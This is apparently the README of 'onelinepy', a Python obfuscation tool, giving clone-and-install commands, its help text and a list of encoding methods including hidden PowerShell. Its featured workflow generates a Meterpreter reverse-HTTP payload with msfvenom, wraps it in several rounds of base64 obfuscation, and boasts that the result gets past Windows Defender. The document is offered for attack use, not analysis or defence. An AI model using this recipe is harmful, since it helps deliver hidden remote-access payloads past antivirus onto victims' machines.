git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
_ _ ___ ___ ___| |_|___ ___ ___ _ _ | . | | -_| | | | -_| . | | | Python |___|_|_|___|_|_|_|_|___| _|_ | Obfuscator |_| |___| usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT] optional arguments: -h, --help show this help message and exit -m M Obfuscating Method (i.e, -m /one_line/base64) -i I Iterations For Obfuscation. --script SCRIPT File path of Python file to Obfuscate. --code CODE Python code to Obfuscate. --list List Obfuscating Methods. --output OUTPUT Output File.
- Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt
- Obfuscate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfuscated_payload.txt
- Profit! The Obfuscated Payload works against Windows Defender.
onelinepy -m /one_line/base64 --script payload.py -i 3
onelinepy -m /one_line/hex --code "print('HEX!')"
_ _ ___ ___ ___| |_|___ ___ ___ _ _ | . | | -_| | | | -_| . | | | Python |___|_|_|___|_|_|_|_|___| _|_ | Obfuscator |_| |___| Obfuscators ( * = May cause Syntax Errors ) -=============- 0 /one_line/hex 1 /one_line/base64 2 /one_line/base32 3 /one_line/gunzip* 4 /one_line/rot13* 5 /cmd/command 6 /cmd/powershell 7 /cmd/powershellhidden